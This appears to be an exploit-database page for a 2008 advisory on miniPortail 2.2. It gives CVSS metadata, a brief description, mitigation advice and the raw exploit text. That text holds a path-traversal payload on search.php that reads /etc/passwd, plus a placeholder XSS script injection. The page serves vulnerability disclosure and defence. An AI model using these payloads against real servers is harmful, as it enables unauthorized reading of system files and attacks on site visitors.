header-logo
Suggest Exploit
vendor:
miniPortail
by:
StAkeR
7.5
CVSS
HIGH
Cross Site Scripting (XSS) and Local File Inclusion (LFI)
79, 22
CWE
Product Name: miniPortail
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities

By exploiting the vulnerability, an attacker can inject malicious JavaScript code into the search.php page, which will be executed in the browser of the victim. Additionally, an attacker can exploit the Local File Inclusion vulnerability to read arbitrary files from the server.

Mitigation:

Input validation should be used to prevent XSS and LFI attacks. Additionally, access to sensitive files should be restricted.
Source

Exploit-DB raw data:

/*

   miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
   -------------------------------------------------------
   By StAkeR - StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/miniportail.zip
   -------------------------------------------------------
   
   -1 Local File Inclusion
   -  search.php?lng=../../../../../../etc/passwd%00
   
   -2 Cross Site Scritping (POST)
   -  search.php (<script>[javascript]</script>)
   
*/

# milw0rm.com [2008-10-23]

Navigation

Suggest Exploit

Services By CQR